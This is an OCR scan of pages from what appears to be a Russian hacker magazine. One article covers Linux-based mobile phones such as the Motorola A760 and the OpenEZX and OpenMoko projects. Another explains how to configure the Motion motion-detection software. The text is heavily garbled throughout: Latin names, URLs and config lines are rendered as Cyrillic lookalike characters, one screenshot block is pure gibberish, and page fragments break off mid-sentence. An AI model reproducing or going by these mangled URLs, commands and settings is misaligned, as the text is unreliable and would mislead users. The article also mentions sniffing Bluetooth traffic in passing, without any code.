бильные платформы и теперь не только успешно конкурирует с ЗутЬіап ОЗ/ѴѴІпсІошз 
СЕ, но и обращает в свою веру все больше и больше производителей сотовых телефо- 
нов, число которых стремительно растет. Ілпих на мобильном — это уже не экзотика, 
а повседневная реальность. Насчитываются сотни разнообразных моделей, которые 
любой желающий может хачить, ковыряясь в недрах ядра и наращивая его функцио- 
нал, что безумно интересно, но, к сожалению, в среде отечественных хакеров практи- 
чески не практикуется. Мыщъх надеется, что своей статьей он сорвет пелену мрака, 
подтолкнув креативных кодокопателей к исследовательской деятельности. 



□ отовые телефоны первого поколения являлись «вещью в 

себе» и не позволяли устанавливать никакого программно- 
го обеспечения сверхтого, котороеуже было зашито в них 
производителем. Потом появились Заѵа-мидлеты (игры, ор- 
ганайзеры, еіс), но сильно лучше отэтого не стало. Тем временем по своей 
аппаратной мощности телефоны вплотную приблизились к компам конца 
90-х, существенно потеснив наладонники. 

Современный сотовый телефон (аточнее, смартфон) представляет собой полно- 
ценный компьютер с операционной системой (БугпЬіап ОЗ/ѴѴіпсІоѵѵзСЕ), поддер- 
живающей развитый набор АРІ-функций и за счетвиртуальной Заѵа-машины аб- 
страгирующей программиста от архитектурных особенностей конкретного железа. 
Такв чемже проблема? Качай 50Кипрограммируй!Хочешь — подЗаѵа-машину, 
хочешь — под нативный процессор (благо мобильные оси это позволяют). 
Воттолько Заѵа-машина конкретно тормозит, а нативные программы стра- 
даютхронической непереносимостью, работая на строго определенных мо- 



делях, что сужает круг потенциальных пользователей до размеров черной 
дыры (ну или нейтронной звезды, если это популярная платформа). 

И сходных те кето в операционной системы нет— какеехачить? Крометого, 
не предоставляется прямой доступ к электронной оснастке телефона. Од- 
ним словом, сотовые телефоны — это не для хакеров. Но с выходом Моіогоіа 
А760 ситуация коренным образом меняется... 

г ОРЛЯТА УЧАТСЯ ЛЕТАТЬ 

Аппарат Моіогоіа А760, разработанный в 2003 году на базе процессо- 
ра АВМ7, стал первым сотовым телефоном, оснащенным специальной 
версией І_іпих, адаптированной под мобильные платформы. Собственно 
говоря, от І_іпих там только сильно урезанное ядро серии 2.4.x, библиотека 
діібс, драйверы для управления встроенным оборудованием, чисто сотовое 
программное обеспечение (аудиокодеки, стек 65М-протоколов, еіе) и, 
естественно, привычный графический интерфейс с иконками, записными 
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Моіюгоіа Покг Е6 — сотовый телефон с І_іпих на борту 



книжками, органайзерами, играми и прочей мишурои. 

Внешне (с потребительской точки зрения) телефон ничем не выделяется в 
пестрой армии своих собратьев и большинству пользователей (несильно 
продвинутых в техническом плане) все равно, какаятам ось, главное — это 
интерфейс. Так в чем же преимущества І_іпих перед конкурентами? 
Во-первых, открытый код, разрабатываемый Ореп Зоигсе сообществом, не 
только нетребуетлицензионных отчислений, но и намного более стабилен, 
поскольку исходные тексты изучает огромное количество людей. 
Во-вторых, І_іпих, известный своими скромными системнымитребования- 
ми, отличается быстрой загрузкой и высокой реакционной способностью 
телефона, который нетормозити потребляет намного меньше энергии, 
на что обращаютвнимание даже блондинки, не говоря о продвинутых 
пользователях. 

В-третьих, системные вызовы І_іпих давно стандартизированы, под него на- 
писано огромное количество программного обеспечения, перенос которого 
на новые мобильные платформы осуществляется простой перекомпиляцией 
(ну, пускай не без адаптации, но это совсем не то же самое, что полное пере- 
писывание кода с нуля). Что касается хакеров, теперь можно зарядить теле- 
фон боевой амуницией и грабить ВІиеІюоО'і-трафик, создавать ІСМР-туннели 
для бесплатной связи по СРЕЗ и делать много других интересных вещей. 
В-четвертых, код ядра легко модифицировать по своему усмотрению, нара- 
щивая функциональность телефона или разблокируя функции, заблоченные 
производителем потем или иным соображениям. Допустим, втелефоне на 
аппаратном уровне реализован режим турбозарадки батарей, но не отлажен 
и потому отложен до лучших времен. Или же производитель не хочет, чтобы 
модели начального уровня конкурировали со своими старшими собратьями... 
В-пятых, в сотовыхтелефонах (вот ужас!) нет ВІ05, и заботу по инициали- 
зации оборудования берет на себя ядро, выставляющее тактовые частоты 
процессора, тайминги оперативной памяти, режимы работы дисплея. Ну 
а какой русский не любит быстрой езды, то есть разгона процессоров?! 
Да-да! Теперь процессоры сотовых телефонов тоже можно разгонять! 
Зачем? Допустим, видео при просмотре слегка тормозит, но стоит чуть-чуть 
повысить тактовую частоту, кактормоза исчезнут. Разве не прелесть? 
В-шестых, в І_іпих нет(и не будет) ни йРМ, ни прочей дряни, загрязняющей 
информационное пространство и отравляющей пользователям жизнь. 
Открытый код не позволяет защищать цифровой контент, поскольку ничего 
не стоит отломать защиту, перекомпилировать ядро, залить его втелефон и 
наслаждаться своей любимой музыкой или клипами. 

^ СТАНДАРТИЗАЦИЯ МОБИЛЬНОЙ ВЕРСИИ ЫІШХ 

Скачать исходные тексты ядра Моіогоіа А760 можно какс официального 
сайта ( Ьир5://ореп5оигсе.то1ого[а.сот/5І : /5Ітаіп/бо/Ьоте ]. так и с Кузни 



( 5оигсеі : огде.пеі/рго)есі/5ЬоѵѵЯ[е5.рІ~ір?дгоир іб=1 16309 ). Но ядро — это 
еще не все, далеко не все. Помимо него требуются драйверы и куча других 
модулей, часть из которых специфична для каждой модели, а часть — сис- 
темнонезависима. То есть они станутсистемнонезависимыми, когда будет 
выработан единый стандарт, которому станут следовать как производители 
железа, так и разработчики софта. 

В рамках проекта 0репЕ2Х (орепегх.огд ) было создано программное обеспе- 
чение для телефонов Моіогоіа А728, А760, А768, А780, А91 0, А1 200, Е680, Е680І, 
Е680д, Е690, РокгЕ2, РокгЕб, Вігг26, Ва2г2 и І876. На сервере компании ( ѵѵікі. 
орепегх.огд/Маіп Раде ) выложены исходные тексты ядра, описание аппарат- 
ной части, и остальных компонентов, распространяющихся по лицензии 6РІ_, 
бинарные сборки (для самых ленивых), загрузчик, позволяющий заливать пе- 
рекомпилированное ядро втелефон и управлять параметрами загрузки, а так- 
же инструментарий для разработки своих собственных программ, созданный 
на основе кросс-среды от Дэна Кегела ( ѵѵікі.орепегх.огд/СгоззсотріІе ). Как 
нетрудно заметить, проектОрепЕ2Х, несмотря на свою открытость, замыкается 
на продукции компании Моіогоіа и не находит применения за ее границами. 
ПроектОрепМоко ( ѵѵѵѵѵѵ.орепппоко.огд ). впервые реализованный на 
платформе ЕЮ Ыеоі 973, оказался болееудачным и в настоящее время 
используется на Моіогоіа Е680І/А780 ОМ2007.2/А1 200Е ОрепМоко 2007.2, 



Сотовый телефон ЕЮ Ыеоі 973 с 
мобильной версией І_іпих, осно- 
ванной на проекте ОрепМоко 










[Универсальный загрузчик Ц-Ьооі [оабег в действии| 



Компания МоЫгоІа раздает всем желающим исходные тексты 
|і_іпих-ядра, используемого ей в своихтелефонахЦ 
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> Ііпкз 

• ІихтоЬіІ.огд — 

основной портал для 
хакеров, интересую- 
щихся мобильными 
устройствами с Ыпих 
на борту. 

• Ыод.ѵѵігесі.сот/ 

кольный блог про 
гаджеты, где ты 
можешь найти посте 
техническими харак- 
теристиками восьми 
лучших сотовых 
телефонов с І_іпих. 

• Боигсеіогде. 
пеі/ ргоіесІз/ЫоЬ 

— исходные тексты 
мобильного загруз- 
чика І_іп их для АРМ - 
платформ. 

• ѵѵікі.орептоко. 
огд/ѵѵікі/Ц-Ьооі 

— описание универ- 
сального мобиль- 
ного загрузчика, 
поддерживающего 
большое количество 
платформ. 



Тгео 650, РаІтТХ, а также некоторых других аппаратах, список 
которых постоянно расширяется. 

На главной странице проекта ргоіесіз.орептоко.огд выложе- 
но нетолько ядро, но и большое количество и сходных те кето в 
различных мобильных приложений (например, 6РР5 Іосаіог] и 
утилит для разработчиков. Самой полезной из них был и остается 
универсальный загрузчик ІІ-ЬооІ Іоабег (ѵѵікі.орептоко. огд/ѵѵікі/ 
ІІ-ЬооІ:), разработанный невероятно креативным программи- 
стом Гарольдом Вельтом, у которого есть свой блоге огромным 
количеством технической информации Іаіогае.апитопкз.ога/ 
ѵѵеЫоа/іпсІех.бітІ . где, в частности, можно найти инструкцию по 
разблокированию залоченных аппаратных возможностей. 
Загрузчик нужен не только для обновления ядра, но и для 
заливки нативных Ыпих-приложений самостоятельной 
разработки. Сами же приложения создаются при помощи 
инструментария, предоставляемого поставщиками мобильных 
версий І_іпих (впрочем, при желании можно обойтись и штат- 
ным компилятором 6СС). 

г телефоны с ишіх левой сборки 

Стандарты — это, конечно, замечательно, но некоторые про- 
изводители предпочитают использовать свои собственные, 
ни с чем не совместимые решения, что связано не столько со 
снобизмом, сколько с сыростью и неразвитостью существую- 
щих стандартов. Естественно, хачитьтакиетелефоны очень 
сложно и от их приобретения лучше воздержаться. 

В первую очередь хотелось бы обратить внимание на 
компанию ІтСоБуз ( ѵѵѵѵѵѵ.ітсозѵз.сот ). выпускающую 
мобил ьные устройства на базе Ыпих. 

Контора зажимает исходные тексты, вероломно на- 
рушая лицензию 6РІ_, и отправляет все претензии от 
сообщества Ореп Боигсе прямиком в /беѵ/пиіі. Даже 
если оставить юридические разборки в стороне, пользы 
от Ыпих без исходных текстов нет никакой. И хачить его 
практически невозможно. 



Аппараты Огипсіід Огеатрбопе 6500І/В700/ІІ900 также осно- 
ваны на Ыпих, но исходных текстов что-то не наблюдается. Ну и 
ка к и х п р и кажете ха ч ить? ! 

Аппараты РОАОбтЬН —8101, 5101 К, І_1 01 ( ѵѵѵѵѵѵ.гоасІ-атЬб. 
бе) — работают под управлением самостоятельно адаптиро- 
ванной версии Ыпих с ядром 2.6, но ни и сходных те кето в, ни 
инструментов для разработки программ, ни какой бы то ни 
было документации на сайте компании нет. 

Аппараты ЫеиПѵѵіп Тае* Е28/Е283 1 /0ѴѴ1 /ОѴѴЗ используют 
Ыпих под эгидой своего собственного проекта ОрепТѵѵіп ( ѵѵѵѵѵѵ. 
орепіѵуіп.ога ) с открытыми исходными текста ми, документа- 
цией и средами разработки, однако поддержки остальных 
производителей он не получил. Моіогоіа стала единствен- 
ной компанией, выпустившей модельтелефона на основе 
ОрепТѵѵіп — А910І, и эта модель оказалась одна. Других не 
последовало. Во всяком случае, пока. 

Таким образом, приобретая телефон с Ыпих, необходимо 
заблаговременно убедиться, что производитель придержива- 
ется лицензии 6РІ_ и не скрывает исходные коды от потре- 
бителей. В принципе, сорцы нетакуж и важны. Если ядро не 
слишком сильно покоцано и номера системных вызовов не 
изменены (а обычно всетаки есть), то разработка собственных 
приложений не станет большой проблемой. Однако прежде 
чем написать«Не11о, ѵѵогіеі!», придется выполнить объемный 
ресерч, дизассемблировав ядро и разобравшисьс архитек- 
турой конкретной мобильной платформы, а также сконструи- 
ровать свой собственный загрузчик. Настоящие хакеры не 
боятся трудностей — они ихтолько закаляют. Однако начинать 
лучше всего с хорошо изученных аппаратов с открытыми 
исходными текстами и вменяемой документацией, собравших 
вокруг себя целое сообщество хакеров, к которым всегда 
можно обратиться за помощью, если что-то непонятно или не 
клеится. Как, вероятно, уже успел заметить читатель, наиболее 
перспективной в этом плане является линейка телефонов 
Моіогоіа (и это не реклама!). 



ІІІ И 8 ШЙ І! 

\ЗёШ 



етая телефон с ыпих, неооходимо заолаговремен- 



зии 



едиться, что производитель придерживается лицен- 
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В ЗАКЛЮЧЕНИЕ 

Ьіпихуже давно вышел из детского возраста, превратившись из игру- 
шечной системы в мощное оружие хакерского пролетариата, атакующее 
рынок проприетарного софта и оккупировавшее все доступные ниши: от 
встраиваемых устройств до суперкомпьютеров. Открытая модель разра- 
ботки таит в себе огромные возможности, о которых закрытому коду можно 
и не мечтать! 

Купив сотовый телефон с мобильной версией І_іпих, придерживающейся 
лицензии 6РІ_, мы получаем в свое распоряжение аппарат, который можно 
хачить по полной программе в свое удовольствие. Кмобильным версиям 
І_іпих, нарушающим лицензию ѲРІ_ (то есть основанным на закрытых 
исходныхтекстах), сказанное не относится. Они ничуть не лучше ѴѴіпсІоѵѵз 
СЕ и даже хуже ее, поскольку ѴѴіпсІоѵѵз СЕ — известный зверь, а кустарно 
адаптированная версия Ьіпих без документации и 5ЭК — это просто тихий 
ужас и ночной кошмар программистов, пытающихся ее раскурить. ИЛ 



АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Поставщики 
мобильных версий 
Ьіпих 



Некоторые производители телефонов самостоятельно адаптируют ядро 
Ьіпих (обычно зажимая при этом исходные тексты и не предоставляя 
никакой поддержки для создателей независимого ПО), но большинство 
компаний предпочитает использовать мобильные версии Ьіпих от сто- 
ронних разработчиков, экономя свои собственные силы и время. 

Из основных поставщиков Ііпих на мобильном рынке стоит отметить 
корейскую фирмѵМі 7.І КеяеатгЬ ТпсогрогаГесІ Гѵѵѵѵѵѵ.гпі/і.согпУ главнымпотре- 
бителем продукции которойявляется корпорация Загп5іт§; ЕІесГгошсз, уже 
выпустившая телефоны Заігаіт§ЗСН-і839/ЗСН-і858/8СН-і819/8СН-і519. 
Эти мобилы вполне пригодны д/ія хака и прочих издевательств . 
Адаптированная версия Ьіпих носит гордое имя РШЗМ, распространя- 
ясь по лицензии СРЬ. Вместе с исходными текстами ядра с РТР-сервера 
компании можно свободно (и бесплатно!) скачать ЗЭК и эмулятор. 

Ну, эмулятор или живой телефон — это дело вкуса, а вот ЗЭК — это 
очень даже хорошо! Заходим на ѵѵѵѵѵѵ.тігі.сот/іпсіех.ріір /беѵеіореге# 
и качаем. Документация лежит на ѵѵшѵѵ.тш.сот/босз/ргобисСз/ 

РгігтЗ ѵѵіікерарег ЕІМ.рсІЬ а спецификации — на ѵѵѵѵѵѵ.тігі.сот/іпбех. 
рЬр/ргігт-зресШсагіопз . 

ЗЭК включает в себя кросс-компилятор, заголовочные файлы и ІЭЕ, 
внешне похожую на популярную графическую среду разработки Есіірзе 
3.0, но, в отличие от последней, работающую не только в Ьіпих, но и под 
ѴѴіпсІоѵѵз. Поддерживаются следующие языки программирования: Си, 
Си-М-иПитон. 

МопГаѴізГа Зоігѵѵаге Гѵѵѵѵѵѵ.тѵізГа.сот) — другой крупный поставщик 
Ьіпих, завоевавший доверие таких фирм, как ИЕС, Рапазопіс и Мосогоіа. 
Собственно говоря, МопІаѴізГа Ьіпих базируется на проекте Могогоіа 
Е2Х, что вносит сумятицу в ряды программистов и вызывает огромное 
недовольство самой Могогоіа, но такова уж природа СРЬ-лицензии. 
МоСогоІа вьшустила открытое ядро, а МопГаѴізГа Зоігѵѵаге выхватила его 
у нее из рук и стала предлагать другим компаниям на своих условиях, 
впрочем, отвечающих требованиям СРЬ. 

Другими словами, в нашем распоряжении имеются и исходные тексты 
ядра, и документация, и ЗЭК, и даже АррНсаПоп Эеѵеіорег КП с ЭеѵКоскеГ 
5 ІЭЕ, представляющий собой набор утилит для создания, сборки и 
отладки мобильных приложений. В отличие от Мігі ЗЭК, ЭеѵКоскеГ 5 
ІЭЕ основан на настоящей Есіірзе, а ее утилиты — это ни что иное, как 
плагины. То есть Ьіпих-программисты будут чувствовать себя в своей 
тарелке, а вот ѴѴіпсіоѵѵз-разработчикам придется забыть о Ѵізиаі ЗШсііо и 
снова садиться за парту. 

Документация находится по адресу ѵѵѵѵѵѵ.тѵізга.сот/ргосіисі: 
баШзЬееЩ.рЬр. а Эеѵеіорег КіГ — по адресу ѵѵѵѵѵѵ.тѵізГа.сот/ргосіисі: 
беіаіі ШоІз.рЬр . 



Специальное предложение: 
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Установка прямого московского телефонного номера 



Многоканальны* телефонные номера 



ІР-телефония 
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ВЛАДИМИР «ТЦВВІМА» ЛЯШКОІ 
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,остаточно оставить люоую вещь на некоторое время оез присмотра, как 



|нее прирастут ноги. Но что делать, ведь не у всех есть на работе отдельный 



Ікабинет, а в общежитии — комната. Вот и приходится надеяться на чест 



ость окружающих, закрывать самое ценное на замок или... сделать все 



знать о происходящем в наше отсутствие 
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В СИСТЕМАОБНАРУЖЕНИЯ ДВИЖЕНИЙ МОТІОЫ 

Можно, конечно, перед уходом включить видеокамеру (не забыв ее 
спрятать от любопытных глаз), а по приходу просмотреть запись. Но у этого 
достаточно простого в реализации метода есть очень большой недостаток. 
Наверняка большую часть записи будет составлять статическая информа- 
ция (помещение без действия). Азначит, просмотр тебе быстро наскучит, 
даже при ускоренном воспроизведении. Но самое главное — придется 
поискать очень емкий носитель, на который все это будетзаписываться. 
Поэтому этот вариант отметаем, тем более есть более изящное решение. 
Гораздо эффективнее, если вместо всего потока, приходящего с камеры, на диск 
будетзаписана информация только при обнаружении изменения. Зашел чело- 
век — запись началась, вышел — закончена. Тогда при просмотре можно будет 
быстро разобраться, заходил ли кто в комнату, и если да, то что он там делал. 
Поиск на специализированных ресурсах, вроде ІтевбтеаГпеб выдаст не 
один десяток проектов, но фактически на данный моментактивно развива- 
ются только три — Мобоп ( ѵѵѵѵѵѵ.Іаѵгвеп.сікАѵѵікі/Ьіп/ѵіеѵѵ/Мобоп/ѴѴеЬНоте І. 
2опеМіпсІег ( ѵѵѵѵѵѵ.гопептіпсіег.сот ) и ЫеіАѵіз ОЬзегѵег ( ѵѵѵѵѵѵ.пеіаѵів.пеі/еѵо/ 
уѵеЬ/хрегІ5/1049 ЕЫ ). Такчто выбрать есть из чего. 



Программа Мобоп способна контролировать сигнал, полученный с одной 
или нескольких видеокамер, и обнаруживать наличие изменений на 
картинке. На выходе получаем фотки в форматах іред, ррт или тред 
видеопоток, который можеттранслироваться в сеть или записываться 
в файл. При необходимости на указанный почтовый адрес может быть 
отослано сообщение с информацией о событии. Возможно выполнение 
любой предусмотренной пользователем команды или скрипта, поэтому 
реакция системы зависиттолько оттвоей фантазии. Например, в Сети я 
видел информацию, какзаставить Ав^егіэк звонить на мобилу при обна- 
ружении движения. Как вариант, Мобоп может просто захватывать кадры 
с указанного устройства через определенные интервалы времени или по 
команде стоп. 

Мобоп написан на языке Си и изначально разрабатывался для І_іпих, 
но может работать и в РгееВЗй и Мае 05 X. Поддерживаются все типы 
популярных сегодня видеокамер, подключаемых к компьютеру через 115В 
порт, ѴібеоДЫпих устройства и сетевые камеры. Драйверов для видеокамер 
проект Мобоп не предоставляет, поэтому прежде чем начинать настройку, 
убедись, что твоя камера видна операционке. 
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г КОНФИГУРАЦИОННЫЕ ФАЙЛЫ МОТІОЫ 

На странице ОоѵѵпІоасІБ проекта можно найти исходные тексты, а также 
пакеты для некоторых дистрибутивов (Бебога от 7, ОеЬіап І_еппу/5ісІ, ІІЬипІи 
РеізІу/биІБу). Обрати внимание, что некоторые из них собраны с поддерж- 
кой БД, другие — нет. Здесьже найдешь ссылки на 5ѴЫ и срезы Мобоп Юаііу 
и Реіеазев]. А вообще Мобоп присутствует в репозитариях большинства 
дистрибутивов, да и проблем с «ручной» компиляцией обычно не возникает, 
поэтому выбирай удобный для себя способ и устанавливай. 
Конфигурационный файл Мобоп называется тобоп.сопб Если его место- 
расположение неуказано при помощи параметра '-с', демон будетискать 
его в текущем каталоге, в -/.гпобоп и в/изг/іосаі/еіс. При сборке пакетов 
разработчиками обычно используется параметр <<--5уБСопбііг=/е1:с/тобоп», 
поэтому нужный файл, возможно, находится в указанном каталоге. Если 
производиласьустановка из исходныхтекстов, следует переименовать 
файл шаблона тобоп-бІБбсопі 1 (это сделано специально, чтобы при обнов- 
лении не затереть рабочий конфиг). 

Если используется одна камера, файла тобоп.сопі 1 достаточно, но если их 
несколько, для каждой камеры понадобится подготовить персональный 
соп^-файл. Общие для всех настройки оставляем в основном, а индивиду- 
альные выносим в отдельные файлы. Кстати, в архиве уже есть несколько 
готовых шаблонов бігеасіП -4].сопб Если в будущем планируется расшире- 
ние, то лучше сразу использовать Ібгеаб-файл и подключить его в гпобоп. 
соп{ при помощи конструкции: 

Ыігеасі /изг/ІосаІ/ебс/ЫтгеайІ . сопЕ 



Фактически вся рабочая система представлена демоном, который потребляет 
небольшое количество системных ресурсов. Втекущей версии 3.2убраны 
практически все параметры командной строки запуска, поэтому установки 
производятся исключительно путем правки конфигурационных файлов. Никаких 
супер-пупер удобных графических инструментов для этих целей не предусмотре- 
но. Хотя Мобоп имеет встроенный Ы:1р-сервер, предназначенный для просмотра 
захваченного видео и прямой правки параметров в конфиге. Ряд проектов [ѵѵѵѵѵѵ. 
[аѵгБеп.бкДѵѵікі/Ып/ѵіеѵѵ/Мобоп/РеІаІіебРгоіес^Б . ѵѵѵѵѵѵ.БІІісопФо.сот/Бо^ѵѵаге/ 
[ѵБ/бос/іпіогтабоп.бЕтІ І предлагаютинтерфейсдля просмотра и настройки. 



Чтобы не путаться в конфигах, будем настраивать работу одной камеры 
в основном файле. Привести Мобоп в действие можноза счетправки 
нескольких параметров: 

$5іібо тсесШ/еІс/тобоп/тоІіоп.соп^ 

# Видеоустройство для захвата, в РгееВЗБ по умолчанию 
/йеѵ/ЬкЕгО 

ѵійеосіеѵісе /йеѵ/ѵісІеоО 

# Используемый вход для видео, может иметь два значения; 

# по умолчанию используется 8 (для ИЗВ камер) , для Ѵ4Ь 
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Установка драйверов веб-камер в КІІЬипГи 



'гкшіпд Ііѵяигі # - -ипМ.д ГЛ г .'■ёСі'шЬіху'исгіінп.сргЛ 
14-йлмп голи? »1зг- '»»*«■» ічі Т1І* В : № ■ня*’ ІЛт к іірк^т 

і+лг|ф ЧМй^тНИГ: Ч* 4мі* ЧІІІ- ** 41*М | Ь4*Ь- 

44-чгіф 44414* -і*Гі#Ф(|_4Ф|іЧ4і , і;іі:і“і ■* 4«#С* Ш*** <91 ««14^1 
«иМ| 44494* тііГ^ыл- '«* ыи Г|^+ & «?«№> 

■гвіМд идея ѵ в ш я і+. І Гі+ічш* м ип І і 1 !* вг иг*-:іы , 

СШ1 I I д ф!ЗНЪ ■ Е ГК1._ЖЛ іЬ 1 ЧС ШЕЛ ГІ'І* С- ш ОГК С+Г г 

лг«і схіГід ср~ЗБ', р Ь г к р._нгі ’ 4» шел ГЛ* сг ебгкЬ&пр 

иНкгяыі сопПд вс^лс* 1 - г Ьгк*._мгі 1 ^ шей ГПв с* (ЬгісБ*гр 
ІйФлмі знпПд ж4зрл "ЙМЩ >Ічч іпр*.а і“: На іисіі Ші*г 41 іѵсічгч’ 
РМ «ИП* «4ЯІ* "Ё •“**._+! 4Ф_Ф І *Аі_Г: 4* <№* 41* 4* чИ*ЙН*** 
Ѵ^ьй*-ч 4НПф 44414 й " Г ^ МЬ_*4пт_«41 1 “ Щ і*А* *іЧ* * 4Пч* І*т 
»нм 44*П| 44494 й "М^Фи^-Г *+ І*С" •‘ІІІ Ф* «*444Кр 

Чг#ш и і'глй .■«смяи«ѵ*сііійл сыѵ? 

Чгтма ьгвп+а 

■сліэ'-'Лі іра.' * 7 3 глг^-д, іКіірігд [«лкііп 
к>.і.Е'*-п(.Ір4: Рн- -заі в вп ре*-Ё Н44 

иіхв нтг іп рѵгЧ ФЙѴЗ 
№44 Гііі М*АЖн[ЮТШ*4ДКЫІ9' 



ГТК С'МЧИЧ |^^.’цьг*й1|+Л‘ 



ь.'ѵ.і ЖТНЧЧЛ.ІѴІ П | 



гы*1 >»П і:-К]1*Н* № ІР4 ЛЕГ I 



III ІГѴ*М«-ШЛ| 

III ч;м Г|й|1П|1Ч • г»! 

ім чин еі#*іА) 



1зІ4 «■■■Рі'І ішви іагу 

Ье пъ і .«чшЛаЬ'иПхи ьл^ѵчиі/ІЗ- МйіРІ^^Іыи -Н. ; эд 
іігк'ілкт: РтгшнЁ-ап «"іга 
РІлЫЛ «4 . тП*!Г-д 



Запускаем МоГіоп 



устройств ставим 1 
іприб 8 

# Устанавливаем количество захватываемых кадров в секун- 
ду; 

# здесь следует ввести число в диапазоне 2 — 100 (100 — по 
умолчанию ) 

# для РАЬ стандартным является 25 
бгатегабе 25 

# И не менее важный параметр багдеб_сі±г , в нем определяем 
каталог , 

# куда будем складывать захваченные с видеокамеры файлы; 

# в качестве имени можно использовать переменные , 

# все они описаны в оригинальном файле 
багдеб_сІіг /ѵаг/ІіЪ/тобіоп/зпарзбюбз/ 

# Имя файла для снимков и видео , в примере оставляем зна- 
чение по умолчанию 

# %У = год, %ш - месяц, %сі = день, %Н = час, %М = минута, %8 



= секунда 

зпарз1іоб_бі1епаше %ѵ-%У%т%сІ%Н%М%5-зпарз]іоб 
3 ред_б і 1 епаше %ѵ-%У%т%<і%Н%М%5-%д 
шоѵіе_бі1епаше %ѵ-%У%ш%б%Н%М%5 
б іше 1 ар зе_бі1 епаше %У%т%сі-біте1арзе 

Вот, собственно, и все основные настройки. Если используется карта ви- 
деозахвата или ТѴ тюнер, при помощи параметра погт указываем стандарт. 
По умолчанию используется 0, то есть РАІ_. Возможны значения 1 — ІЧТ5С, 2 
— ВЕСАМ и 3 — РАб N0. Для ТѴ тюнера также указываем частоту. По умолча- 
нию Ггециепсу = 0. 

Чтобы МоГіоп не переходил в режим демона и выводил отладочную инфор- 
мацию в консоль, используем флаг '— п'. 

$ тобіоп — п 

ТЬгеаб із Тгош /ебс/шобіоп/тобіоп. сопб 
[1] ТНгеаб збагбеб 

[1] тобіоп-ІіббрсЗ/З . 2 . 3 гиппіпд, ассербіпд соппесбіопз 
[1] Рііе об буре 8 заѵесі бо: /ѵаг/ІіЬ/шобіоп/ 



Настройка 
веб-камер в біпііх 

В некоторых дистрибутивах нужные модули ядра подгружаются ав- 
томатически и проблем с определением веб-камер нет. Но если вывод 
«бте5§ | Іезз» не показывает наличие ѵібео4Ііпих устройств, придется 
самостоятельно компилировать модули. Это не сложно. Поиск драй- 
веров для веб-камеры следует начинать со странички гпхбаагбТгее. 
Іт/бо\ѵп1оас1.1іГт1. В настоящее время проект предлагает две версии: 
§зрсаѵ1 «Оепегіс Зобтѵагез Раскате бог Сатега АбарГегз» для ядер > 
2.6.11 изреабхх для раннихверсий ядра. В репозитариях многих дист- 
рибутивов нужные пакеты присутствуют (в іЛшпГи — §зрса-5оигсе и 
зрсабхх-зоигсе) , хотя, возможно, не самых последних версий. Для уста- 
новки драйвера следует скачать пакет и запустить находящийся внутри 
скрипт §5рза_ЬиіИ. Ссылки на некоторые другие решения, предлагаю- 
щие свои драйвера, ищи на странице Эоѵѵпіоасі проекта МоГіоп. 
Подробнее о настройке веб-камер смотри в гЫр.ог§/НОѴѴТО/ѴѴеЬсаш- 
НОѴѴТО. 



2опеМіпсіег 

2опеМіпсіег работает со всеми источниками, которые только можно 
себе представить: 115В и ІР камеры, устройство видеозахвата, поток 
со встроенного веб-сервера, периодически обновляемый локальный 
файл, например, полученный в том же МоГіоп. Поддерживается одно- 
временная работа с несколькими камерами и управление некоторыми 
типами камер. Управление возможно как локально, так и удаленно 
через веб-интерфейс и частично хНТМЬ (с мобильных телефонов) . 
Причем веб-интерфейс обладает гораздо большими возможностями, 
чем в МоГіоп. Работает в Ілпих и РгееВЗБ, есть и клиент для ѴѴіпсіоѵѵз. 
Установка 2опеМіп<1ег чуть сложнее МоГіоп. Потребуется веб-сервер с 
поддержкой РНР, база МуЗГ^Ь и библиотека 1РЕС. 
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Привидения в Мобоп 



Картинка в браузере 



зпарзііобз/ 01-2 007122 52 10503 . аѵі 
[1] Рііе оТ Суре 1 заѵеб Со: /ѵаг/ІіЪ/тоСіоп/ 
зпарзЪоСз/ 01-2 007122 52 10503 -18 орд 

И так далее. В указанном каталоге можно увидеть видеофайл и несколь- 
ко снимков. Если файлы не появляются, прежде чем ругаться, советую 
побегать перед камерой :). Также в ответ на 
ввод команды может последовать сообщение 
о невозможности записи в указанный каталог. 

Вариантов выхода изтакой ситуации целыхдва. 

В тестовом прогоне можно использовать зисіо, а 
в повседневной жизни лучше разрешить запись 
в этот каталогчленам группы (например, ѵібео] и 
себя, естественно, в нее включить. 

Если утебя нет веб-камеры, можно подключить 
любую доступную сетевую камеру или исполь- 
зовать локальный файл. Для этого достаточно в 
параметре пеІсат_игІ указать 1)РІ_. В качестве 
источника может быть НТТР, ЕТР-ресурс, файл в 
форматеіред или гщред видеопоток. Если сете- 
вая камера требует аутентификации, укажи логин 
и пароль в пе1сат_и5егра55. Прокси-сервер 
прописывается в пеісат_ргоху. Да, и главное: 
сетевая камера — это отдельный іЬгеасі, совмест- 
ное использование в одном файле ѵібеобеѵісе 
вызовет конфликт. 

г ИСПОЛЬЗОВАНИЕ ВЕБ-БРАУЗЕРА 

В состав Мобоп включен мини бб:р-сервер, 
который позволяет просматривать в реальном 
времени картинку с камеры в окне браузера. Открываем тобоп.соп^ и ищем 
в самом низу секцию «І_іѵе ѴѴеЬсат Зегѵег». При инсталляции с помощью 
пакетов значение параметра ѵѵеЬсат_роН: установлено в 0, то есть бНр- 
сервер отключен. Чтобы он заработал, достаточно указать здесь любой 
свободный порт (традиционно 8081 ). Параметр \л/еЬсат_ІосаІбо5І: поумол- 
чаниюустанавливается воп, поэтому подключиться кЬНр-серверу можно 
только с локального компьютера. Если планируется заходить по сети, укажи 
здесь оД. Качество выводимых сервером]ред изображений выставляется 
при помощи ѵѵеЬсат_диаІі{у. Значение 50, скорее всего, трогать не при- 
дется. По дефолту картинка в браузере меняется только при обнаружении 
движения. Активировав ѵѵеЬсагтытюбоп, можно указать, чтобы картинка 
постоянно менялась с частотой 1 кадр, а при движении — с частотой, 



указанной в параметре ѵѵеЬсат_тахгаІе. Значение последнего параметра 
по умолчанию установлено в 1 , не стоит указывать его выше 4-5. И еще один 
параметр — \л/еЬсат_ІітіІ, с его помощью указывается максимальное коли- 
чество изображений за соединение. Поумолчаниюустановлено значение 
0, то есть без ограничений. При соединении с Іосаібозі и работе с одной 
камерой, скорее всего, трогать его и не нужно. 

Теперь, если снова запустить Мобоп, в командной 
строке должно появиться сообщение: «Зіагіесі 
зіхеат ѵѵеЬсат зегѵег іп роН 8081 ». Набираем 
в браузере адрес своего компьютера, например 
бир://1оса1бо5б8081 , и смотрим, что показывает 
нам камера. 

С просмотром разобрались, но встроенный 
бб:р-сервер также позволяет изменять настройки 
Мобоп. Конфигурируется эта функциональность в 
секции «НТТР ВазесІ Сопігоі» файла тобоп.сопб 
